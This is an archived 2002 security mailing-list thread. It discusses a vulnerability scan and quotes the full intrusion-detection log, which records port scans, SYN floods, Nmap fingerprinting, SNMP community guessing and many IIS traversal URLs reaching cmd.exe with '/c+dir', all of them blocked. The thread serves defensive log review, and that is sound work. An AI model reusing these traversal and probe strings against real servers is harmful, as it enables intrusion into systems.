You are right. The most you can do is make note and pay attention to not only what was blocked, but perhaps what made it through. Often when looking at firewall logs, my engineer looked only at drops, and never at the approved. So one day, he told me about a particular port scan we got and I looked at all the logs for the attacker. I found that they got through to an ftp server that accepted the packet. Further analysis showed that the attacker attempted to gain root on the box. My engineer didn't catch it again because he was only concerned with drops.
Mrcorp -----Original Message----- From: Mike V [mailto:[EMAIL PROTECTED]] Sent: Monday, February 04, 2002 11:48 AM To: Hornat, Charles; [EMAIL PROTECTED] Subject: Re: Vulnerability scanners: Since the scan included both a port scan,but attempts at various GET requests and directories, even though port 80 was closed. Thus, that rules out anything like code red/nimda/sadmind worm, etc. Seems much more like a scanner checking for known vulnerabilities/brute force method. below is the log information: timestamp (GMT) issueName parameters victimPort 2002-02-01 18:28:08 TCP port scan port=1-32&reason=Firewalled 32 2002-02-01 18:28:48 TCP port scan port=65-112|114-314|321-544&reason=Firewalled 544 2002-02-01 18:29:26 TCP port scan port=545-570|589-832|857-1023&reason=Firewalled&name=Phase+Zero 1023 2002-02-01 18:29:28 TCP port scan port=1020-1023|1025|1027-1031|1033-1038|1040-1043|1045|1047-1053|1057-1058 0 2002-02-01 18:29:30 SOCKS port probe port=1080&reason=RSTsent 1080 2002-02-01 18:29:31 TCP port scan port=1028|1033|1035|1037-1038|1040|1043|1046-1048|1050-1051|1054|1056-1058|1 060-1065|1067-1070|1074-1081|1084-1087|1089-1095|1098-1111|1114-1116 0 2002-02-01 18:29:34 TCP port scan port=1114-1115|1146-1147|1149-1153|1157-1160 0 2002-02-01 18:29:37 TCP port scan port=1147-1148|1151|1153-1156|1158-1187|1189-1195|1197-1203|1205|1207-1218|1 220-1227|1231 0 2002-02-01 18:29:39 SubSeven port probe port=1243&name=Sub_7&reason=RSTsent 1243 2002-02-01 18:29:41 TCP port scan port=1207|1210|1212|1214-1216|1219|1221|1226-1255|1257-1260|1262-1271|1273-1 278|1280-1289|1291-1299|1302-1303|1307-1310 0 2002-02-01 18:29:44 TCP port scan port=1288-1290|1293-1299|1302-1307|1309-1310|1312-1317|1319-1337|1339-1344|1 346-1349|1351-1365|1367-1369|1373-1376|1380-1383 0 2002-02-01 18:29:46 SQL port probe port=1433&reason=RSTsent 1433 2002-02-01 18:29:47 TCP port scan port=1363-1371|1373-1377|1379-1392|1394-1398|1400-1411|1413-1425|1427-1432|1 434-1438|1440-1450|1454-1455 0 2002-02-01 18:29:47 SQL port probe port=1433&reason=RSTsent 1433 2002-02-01 18:29:50 TCP port scan port=1434-1435|1437-1438|1441-1442|1445-1446|1448-1451|1453-1460|1462-1464|1 467-1480|1482-1487|1489-1494|1496-1498|1502-1507|1509-1512|1514|1516-1520|15 24-1527 0 2002-02-01 18:29:52 TCP port scan port=1499-1500|1507-1508|1514-1518|1520-1526|1529|1531-1534|1536-1541|1545|1 548-1560 0 2002-02-01 18:29:56 TCP port scan port=1589-1592|1595-1619|1621-1626|1628-1632|1634-1637|1639-1640 0 2002-02-01 18:29:59 TCP port scan port=1615|1618-1625|1629-1633|1637-1659|1661-1688|1690-1693|1695-1696|1698-1 703|1706|1710-1713|1716-1717 0 2002-02-01 18:30:00 PPTP port probe port=1723&reason=RSTsent 1723 2002-02-01 18:30:02 TCP port scan port=1691-1692|1694-1695|1699-1700|1702-1703|1705-1709|1713-1718|1720-1748|1 750-1770|1772-1777|1780-1782|1786-1788 0 2002-02-01 18:30:05 TCP port scan port=1768-1775|1778-1783|1786-1791|1793-1799|1801-1836|1838-1847|1849-1851|1 855-1858 0 2002-02-01 18:30:08 TCP port scan port=1835-1836|1839-1841|1843-1844|1847-1848|1850-1855|1857-1863|1865-1868|1 870-1896|1898-1907|1909-1913|1915|1917-1918|1920-1923|1927-1929 0 2002-02-01 18:30:11 TCP port scan port=1906|1913-1914|1920-1926|1928-1937|1939-1942|1944-1968|1970-1976|1978-1 982|1986-1989|1993-1999|2003-2006 0 2002-02-01 18:30:17 TCP port scan port=1991|1995|1997-1999|2004|2006-2007|2010-2011|2031-2044|2046-2053|2055-2 070|2072-2075|2077-2080|2083-2097|2101-2104|2108-2111 0 2002-02-01 18:30:20 TCP port scan port=2082|2090|2092-2093|2096-2147|2151-2154|2156-2157 0 2002-02-01 18:30:23 TCP port scan port=2143|2156-2158|2160|2164-2176|2178|2180-2196|2198|2200-2206|2208-2212|2 214-2217|2219|2221-2224|2227-2230 0 2002-02-01 18:30:26 TCP port scan port=2209-2210|2214-2218|2220-2228|2230|2232|2234|2236-2248|2250-2258|2261-2 268|2271-2277|2279-2280|2283-2286|2288|2290-2292 0 2002-02-01 18:30:30 TCP port scan port=2280-2283|2288-2312|2314-2325|2327-2349|2351-2355|2359-2360|2364-2367 0 2002-02-01 18:30:33 TCP port scan port=2348|2350-2351|2354|2357-2359|2361-2368|2371-2390|2392-2402|2405-2416|2 418-2420|2422-2424|2428-2430|2434-2437|2441-2442 0 2002-02-01 18:30:35 TCP port scan port=2412|2415-2416|2420-2421|2423-2426|2428|2431-2438|2440|2444-2453|2465-2 468|2473-2477|2479-2482 0 2002-02-01 18:30:38 TCP port scan port=2468-2471|2474-2529|2531-2534|2536|2538-2541|2544-2545|2547-2548 0 2002-02-01 18:30:42 TCP port scan port=1029|2524-2527|2529-2530|2532|2535|2538|2540|2542-2547|2551-2570|2572-2 576|2578-2583|2585-2609|2611-2615|2619-2622|2626-2629 0 2002-02-01 18:30:45 TCP port scan port=2611|2613-2615|2618-2619|2621-2623|2626-2631|2633-2650|2652-2663|2665|2 667-2678|2680-2683|2687-2690|2694-2697|2701-2704 0 2002-02-01 18:30:45 TCP port probe port=1024-1025|1027-1028|1030-1060|1062-1066|1068-1079|1081|1083-1087|1089-1 116|1146-1242|1244-1432|1434-1542|1544-1560|1589-1719|1721-1722|1724-2011|20 31-2160|2164-2286|2288-2455|2465-2705&reason=RSTsent 2681 2002-02-01 18:30:45 TCP port probe port=2674-2714&reason=RSTsent 2697 2002-02-01 18:30:46 TCP SYN flood PercentFromIntruder=55&SYNs=119&DATAs=0 0 2002-02-01 18:33:13 TCP port scan port=2674|2676-2679|2681-2685|2687-2691|2693|2695-2719|2721-2736|2738-2743|2 745-2756|2759-2783|2786-2806|2809-2820|2822-2828|2830-2874|2877-2880|2883-28 87|2889-2892|2902-2916|2918-2946|2948-2958|2961-2965|2967-2970|2972-2979|298 1-2982|2984-2986|2988 0 2002-02-01 18:34:49 TCP SYN flood PercentFromIntruder=64&SYNs=124&DATAs=1 0 2002-02-01 18:34:55 TCP SYN flood PercentFromIntruder=56&SYNs=104&DATAs=1 0 2002-02-01 18:34:56 TCP SYN flood PercentFromIntruder=66&SYNs=111&DATAs=0 0 2002-02-01 18:35:06 TCP SYN flood PercentFromIntruder=68&SYNs=117&DATAs=0 0 2002-02-01 18:35:07 TCP SYN flood PercentFromIntruder=55&SYNs=129&DATAs=4 0 2002-02-01 18:35:10 TCP SYN flood PercentFromIntruder=62&SYNs=143&DATAs=4 0 2002-02-01 18:35:16 TCP SYN flood PercentFromIntruder=63&SYNs=129&DATAs=1 0 2002-02-01 18:35:17 TCP SYN flood PercentFromIntruder=55&SYNs=103&DATAs=0 0 2002-02-01 18:35:19 TCP port scan port=5898-5921|5923|5926-5930|5932-5959|5962-5978|5980-5984|5986-5992|5994-5 999|6001-6006|6008-6013|6015-6032|6034-6047|6049-6077|6079-6088|6090|6092-61 14|6116-6136|6138-6144|6146-6163|6165-6170|6173-6178|6181-6185|6188-6203|620 5-6231|6234-6258|6262 0 2002-02-01 18:35:30 TCP SYN flood PercentFromIntruder=56&SYNs=112&DATAs=0 0 2002-02-01 18:35:37 TCP SYN flood PercentFromIntruder=61&SYNs=128&DATAs=0 0 2002-02-01 18:35:38 TCP SYN flood PercentFromIntruder=57&SYNs=126&DATAs=0 0 2002-02-01 18:35:48 TCP SYN flood PercentFromIntruder=53|58&SYNs=119|135&DATAs=0|2 0 2002-02-01 18:35:52 TCP SYN flood PercentFromIntruder=65&SYNs=118&DATAs=0 0 2002-02-01 18:35:58 TCP SYN flood PercentFromIntruder=57&SYNs=133&DATAs=1 0 2002-02-01 18:36:53 TCP port scan port=6710-6711|6718|6722-6723|6726|6761-6771|6775-6810|6812-6835|6837-6854|6 856-6872|6875-6883|6885-6892|6894-6911|6913-6937|6939-6992|6994-7000|7002-70 29|7031-7040|7042-7053|7055-7077|7079-7106|7108-7118|7120-7125|7129-7134|713 6-7149|7153-7155|7157 0 2002-02-01 18:38:20 TCP port scan port=1~223|242~248|256~264|280~282|308~321|344~600|606~611|628|633~640|650|6 66|704|709|729~731|737~786|799~801|871|888|911|989~1001|1008~1015|1023|merge range(4)&reason=Firewalled|mergerange(4)&name=Phase+Zero|mergerange(4) 1023 2002-02-01 18:38:34 TCP port scan port=1024-1026|1030|1045|1058-1059|1067|1084|1090|1103|1127|1155|1167|1170|1 234|1241|1243|1245|1347-1350|1354-1357|1361-1364|1368-1371|1375-1378|1382-13 85|1389-1392|1396-1399|1403-1406|1410-1413|1417-1420|1424-1427|1430-1433|143 7-1440|1544-1547|1552 0 2002-02-01 18:38:52 TCP port scan port=1-3|5|7|9|11|13|15|17-25|27|29|31|33|35|37-39|41-223|242-248|256-264|28 0-282|308-317|321|344-444|446-448|464-533|65301&reason=Firewalled 533 2002-02-01 18:38:55 TCP port scan port=534-563&reason=Firewalled&name=Phase+Zero 563 2002-02-01 18:39:07 TCP port scan port=564-600|606-611|628|633-636|640|650|666|704|709|729-731|737|740-742|744 |747-754|758-765|767|769-775|993|995-1001|1008|1010-1012|1015|1023&reason=Fi rewalled 1023 2002-02-01 18:39:14 TCP SYN flood PercentFromIntruder=59|62&SYNs=110-111&DATAs=0 0 2002-02-01 18:39:15 TCP port scan port=1446-1449|1453-1456|1460-1463|1467-1470|1474-1477|1481-1484|1488-1491|1 495-1498|1502-1505|1509-1512|1516-1519|1523-1526|1530-1533|1537-1540|1647-16 50|1654-1657|1661-1664|1668-1671|1675-1677|1723|1827|1981|1986-1987|1991-199 4|1998-2001|2005-2008 0 2002-02-01 18:39:23 TCP port scan port=1~223|242~248|256~264|280~282|308~317|321|344~600|606~611|628|633~636|6 40|650|666|704|709|729~731|737|740~744|747~754|758~776|780~783|786|799~801|8 71|mergerange(2)&reason=Firewalled|mergerange(2)&name=Phase+Zero|mergerange( 2) 871 2002-02-01 18:39:24 TCP SYN flood PercentFromIntruder=63&SYNs=134&DATAs=2 0 2002-02-01 18:39:33 TCP port scan port=1~223|242~248|256~264|280~282|308~321|344~600|606~611|628|633~640|650|6 66|704|709|729~731|737~786|799~801|871|888|911|989~997|7007|mergerange(4)&re ason=Firewalled|mergerange(4)&name=Phase+Zero|mergerange(4) 997 2002-02-01 18:39:34 TCP SYN flood PercentFromIntruder=60&SYNs=138&DATAs=7 0 2002-02-01 18:39:40 NMAP OS fingerprint port=1024|1026&flags=S&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:39:40 TCP ACK ping port=1024|1026&flags=A&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:39:41 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:39:44 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:39:45 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:39:45 UDP port probe port=1024&reason=ICMPsent 1024 2002-02-01 18:40:03 NMAP OS fingerprint port=1024|1026&flags=S&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:03 TCP ACK ping port=1024|1026&flags=A&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:05 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:08 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:09 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:09 UDP port probe port=1024&reason=ICMPsent 1024 2002-02-01 18:40:30 NMAP OS fingerprint port=1024|1026&flags=S&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:30 TCP ACK ping port=1024|1026&flags=A&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:30 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:32 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:32 UDP port probe port=1024&reason=ICMPsent 1024 2002-02-01 18:40:46 NMAP OS fingerprint port=1026&flags=S&options=wscale:10;maxseg:265;time:1061109567-0 1026 2002-02-01 18:40:51 HTTP URL with +.htr appended URL=/default.asp+.htr|/iisstart.asp+.htr&arg=&accessed=no&code=404 5800 2002-02-01 18:40:51 HTTP URL with +.htr appended URL=/iisstart.asp+.htr&accessed=no&code=404 5800 2002-02-01 18:40:51 HTTP URL scan count=4&URL=/cgi-bin/htimage.exe|/default.asp+.htr|/default.asp\|/iisstart.a sp+.htr|/iisstart.asp\|/localstart.asp\|/main.asp\|/rettest.ida 5800 2002-02-01 18:40:51 HTTP asp with \ appended URL=/default.asp\|/iisstart.asp\|/localstart.asp\|/main.asp\&arg=&accessed=n o&code=404 5800 2002-02-01 18:40:51 HTTP asp with \ appended URL=/iisstart.asp\|/localstart.asp\|/main.asp\&accessed=no&code=404 5800 2002-02-01 18:40:51 IIS .printer overflow length=257&URL=/null.printer&accessed=no&code=404 5800 2002-02-01 18:40:52 HTTP URL with +.htr appended URL=/localstart.asp+.htr&arg=&accessed=no&code=404 5800 2002-02-01 18:40:52 HTTP URL with +.htr appended URL=/global.asa+.htr|/index.asp+.htr|/main.asp+.htr|/start.asp+.htr&arg=&acc essed=no&code=404 5800 2002-02-01 18:40:52 HTTP URL with +.htr appended URL=/global.asa+.htr|/index.asp+.htr|/start.asp+.htr&accessed=no&code=404 5800 2002-02-01 18:40:52 HTTP asp with \ appended URL=/index.asp\|/start.asp\&arg=&accessed=no&code=404 5800 2002-02-01 18:40:52 IIS system32 command URL=/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe&arg=/c+dir &accessed=no&code=404 5800 2002-02-01 18:40:52 HTTP asp with \ appended URL=/index.asp\&accessed=no&code=404 5800 2002-02-01 18:40:52 IIS system32 command URL=/IISADMPWD/...%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25 c.%259v..%25c.%259v..%25c.%259v/winnt/system32/cmd.exe|/cgi-bin/...%259v..%2 5c.%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25c.% 259v/winnt/system32/cmd.exe| 5800 2002-02-01 18:40:53 bat URL type URL=/cgi-dos/args.bat&arg=&accessed=no&code=404 5800 2002-02-01 18:40:53 HTTP UTF8 backtick URL=/IISADMPWD/../../../../../../../..//winnt/system32/cmd.exe|/cgi-bin/../. ./../../../../../..//winnt/system32/cmd.exe|/msadc/../../../../../../../..// winnt/system32/cmd.exe|/scripts/../../../../../../../..//winnt/system32/cmd. exe 5800 2002-02-01 18:40:53 IIS system32 command URL=/IISADMPWD/../../../../../../../..//winnt/system32/cmd.exe|/cgi-bin/../. ./../../../../../..//winnt/system32/cmd.exe|/msadc/../../../../../../../..// winnt/system32/cmd.exe|/scripts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/wi nnt/system32/cmd.exe| 5800 2002-02-01 18:40:54 CGI campas URL=/cgi-bin/campas&arg=&accessed=no&code=404 5800 2002-02-01 18:40:54 IIS system32 command URL=/IISADMPWD/...%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25 c.%25qf..%25c.%25qf..%25c.%25qf/winnt/system32/cmd.exe|/cgi-bin/...%25qf..%2 5c.%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25c.% 25qf/winnt/system32/cmd.exe| 5800 2002-02-01 18:40:54 Cold Fusion sample URL URL=/cfdocs/expeval/exprcalc.cfm&arg=&accessed=no&code=404 5800 2002-02-01 18:40:55 HTTP URL scan count=4&URL=/IISADMPWD/..%255c../..%255c../..%255c../winnt/system32/cmd.exe| /IISADMPWD/...%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%2 58s..%25c.%258s..%25c.%258s/winnt/system32/cmd.exe| 5800 2002-02-01 18:40:55 IIS system32 command URL=/IISADMPWD/..%255c../..%255c../..%255c../winnt/system32/cmd.exe|/IISADMP WD/...%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25 c.%258s..%25c.%258s/winnt/system32/cmd.exe|/cgi-bin/...%258s..%25c.%258s..%2 5c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s/winnt/s ystem32/cmd.exe 5800 2002-02-01 18:40:55 Cold Fusion sample URL URL=/cfdocs/expeval/sendmail.cfm&arg=&accessed=no&code=404 5800 2002-02-01 18:40:55 IIS system32 command URL=/IISADMPWD/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd. exe|/IISADMPWD/..\..\..\..\..\..\..\..\/winnt/system32/cmd.exe|/_vti_bin/../ ../../../../../../..//winnt/system32/cmd.exe|/cgi-bin/..\..\..\..\..\..\..\. .\/winnt/system32/cmd.exe| 5800 2002-02-01 18:40:56 IIS system32 command URL=/IISADMPWD/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252 e%252f%252e%252e/winnt/system32/cmd.exe|/IISADMPWD/...%25pc..%25c.%25pc..%25 c.%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc/winnt/sy stem32/cmd.exe| 5800 2002-02-01 18:40:56 SNMP backdoor community=all_private|community|default|network|openview|password|private|se cret|tivoli&product=Sun 161 2002-02-01 18:40:56 SNMP Crack community=admin|worldread 161 2002-02-01 18:40:56 SNMP port probe port=161&reason=Firewalled 161 2002-02-01 18:40:57 CGI htmlscript URL=/cgi-bin/htmlscript&arg=&accessed=no&code=404 5800 2002-02-01 18:40:57 HTTP UTF8 backtick URL=/IISADMPWD/..\..\..\..\..\..\..\..\/winnt/system32/cmd.exe|/_vti_bin/../ ../../../../../../..//winnt/system32/cmd.exe|/_vti_bin/..\..\..\..\..\..\..\ ..\/winnt/system32/cmd.exe|/cgi-bin/..\..\..\..\..\..\..\..\/winnt/system32/ cmd.exe| 5800 2002-02-01 18:40:57 HTTP URL scan count=4&URL=/IISADMPWD/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/% 252e%252e%252f%252e%252e/winnt/system32/cmd.exe|/IISADMPWD/.%252e/.%252e/.%2 52e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe| 5800 2002-02-01 18:40:57 IIS system32 command URL=/_vti_bin/...%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c .%258s..%25c.%258s..%25c.%258s/winnt/system32/cmd.exe|/_vti_bin/..\..\..\..\ ..\..\..\..\/winnt/system32/cmd.exe|/msadc/.%252e/.%252e/.%252e/.%252e/.%252 e/.%252e/winnt/system32/cmd.exe| 5800 2002-02-01 18:40:57 IIS system32 command URL=/IISADMPWD/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252 e%252f%252e%252e/winnt/system32/cmd.exe|/IISADMPWD/.%252e/.%252e/.%252e/.%25 2e/.%252e/.%252e/winnt/system32/cmd.exe|/IISADMPWD/..%255c../..%255c../..%25 5c../winnt/system32/cmd.exe| 5800 2002-02-01 18:40:57 CGI mlog.html URL=/mlog.html&arg=&accessed=no&code=404 5800 2002-02-01 18:40:58 CGI mylog.html URL=/mylog.html&arg=&accessed=no&code=404 5800 2002-02-01 18:40:58 IIS system32 command URL=/_vti_bin/...%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc..%25c .%25pc..%25c.%25pc..%25c.%25pc/winnt/system32/cmd.exe&arg=/c_dir&accessed=no &code=404 5800 2002-02-01 18:40:58 IIS system32 command URL=/msadc/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252e%25 2f%252e%252e/winnt/system32/cmd.exe&arg=/c+dir&accessed=no&code=404 5800 2002-02-01 18:40:58 CGI nph-test-cgi URL=/cgi-bin/nph-test-cgi&arg=&accessed=no&code=404 5800 2002-02-01 18:40:58 CGI phf URL=/cgi-bin/phf&arg=&accessed=no&code=404 5800 2002-02-01 18:40:58 HTTP cgi starting with php URL=/cgi-bin/php.cgi&arg=&accessed=no&code=404 5800 2002-02-01 18:40:58 IIS system32 command URL=/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe&arg=/c+dir &accessed=no&code=404 5800 2002-02-01 18:40:59 CGI test-cgi URL=/cgi-bin/test-cgi&arg=&accessed=no&code=404 5800 2002-02-01 18:40:59 CGI view-source URL=/cgi-bin/view-source&arg=&accessed=no&code=404 5800 2002-02-01 18:40:59 IIS system32 command URL=/cgi-bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.ex e&arg=/c+dir&accessed=no&code=404 5800 2002-02-01 18:40:59 CGI webdist.cgi URL=/cgi-bin/webdist.cgi&arg=&accessed=no&code=404 5800 2002-02-01 18:40:59 CGI websendmail URL=/cgi-bin/websendmail&arg=&accessed=no&code=404 5800 2002-02-01 18:40:59 CGI webgais URL=/cgi-bin/webgais&arg=&accessed=no&code=404 5800 2002-02-01 18:41:00 IIS system32 command URL=/cgi-bin/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252e% 252f%252e%252e/winnt/system32/cmd.exe&arg=/c+dir&accessed=no&code=404 5800 2002-02-01 18:41:00 Site Server sample URL URL=/adsamples/config/site.csc&arg=&accessed=no&code=404 5800 2002-02-01 18:41:01 IIS system32 command URL=/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe&arg=/c+di r&accessed=no&code=404 5800 2002-02-01 18:41:01 CGI newdsn.exe URL=/scripts/tools/newdsn.exe&arg=&accessed=no&code=404 5800 2002-02-01 18:41:01 IIS system32 command URL=/_vti_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.e xe&arg=/c+dir&accessed=no&code=404 5800 2002-02-01 18:41:01 CGI win-c-sample.exe URL=/cgi-shl/win-c-sample.exe&arg=&accessed=no&code=404 5800 2002-02-01 18:41:02 IIS system32 command URL=/_vti_bin/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252e %252f%252e%252e/winnt/system32/cmd.exe&arg=/c+dir&accessed=no&code=404 5800 2002-02-01 18:41:03 CGI rguest.exe URL=/cgi-bin/rguest.exe&arg=&accessed=no&code=404 5800 2002-02-01 18:41:03 HTTP URL scan count=4&URL=/ROADS/cgi-bin/search.pl|/_vti_bin/%252e%252e%252f%252e%252e/%25 2e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/winnt/system32/cmd.exe|/_vt i_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe|/_vti _bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe| 5800 2002-02-01 18:41:03 CGI wguest.exe URL=/cgi-bin/wguest.exe&arg=&accessed=no&code=404 5800 2002-02-01 18:41:03 Shopping cart order URL URL=/mall_log_files/order.log&arg=&accessed=no&code=404 5800 2002-02-01 18:41:03 Shopping cart order URL URL=PDG_Cart/order.log&arg=&accessed=no&code=404 5800 2002-02-01 18:41:04 WebStore admin URL URL=/Admin_files/order.log&arg=&accessed=no&code=404 5800 2002-02-01 18:41:05 Cold Fusion sample URL URL=/cfdocs/expeval/displayopenedfile.cfm&arg=&accessed=no&code=404 5800 2002-02-01 18:41:05 Cold Fusion sample URL URL=/cfdocs/expeval/exprcalc.cfm&arg=&accessed=no&code=404 5800 2002-02-01 18:41:05 Cold Fusion sample URL URL=/cfdocs/expeval/openfile.cfm&arg=&accessed=no&code=404 5800 2002-02-01 18:41:05 HTTP URL scan count=4&URL=/Admin_files/order.log|/_vti_pvt/authors.pwd|/cfdocs/expeval/dis playopenedfile.cfm|/cfdocs/expeval/exprcalc.cfm|/cfdocs/expeval/openfile.cfm |/cgi-bin/bash|/cgi-bin/perl|/cgi-bin/rksh|/cgi-bin/sh|/cgi-bin/tcsh|/mall_l og_files/order.log| 5800 2002-02-01 18:41:05 FrontPage service.pwd URL=/_vti_pvt/service.pwd&arg=&accessed=no&code=404 5800 2002-02-01 18:41:06 IIS sample URL URL=/msadc/Samples/SELECTOR/showcode.asp&arg=&accessed=no&code=404 5800 2002-02-01 18:41:24 TCP port scan port=80|1024|1026|5800|5900&reason=Firewalled 80 2002-02-01 18:41:27 HTTP port probe port=80&reason=Firewalled 80 2002-02-01 18:41:33 HTTP port probe port=80&reason=Firewalled 80 2002-02-01 18:41:48 HTTP port probe port=80&reason=Firewalled 80 ________________________________________________________________ The information contained in this message is intended only for the recipient, may be privileged and confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, please be aware that any dissemination or copying of this communication is strictly prohibited. If you have received this communication in error, please immediately notify us by replying to the message and deleting it from your computer. Thank you, Standard & Poor's
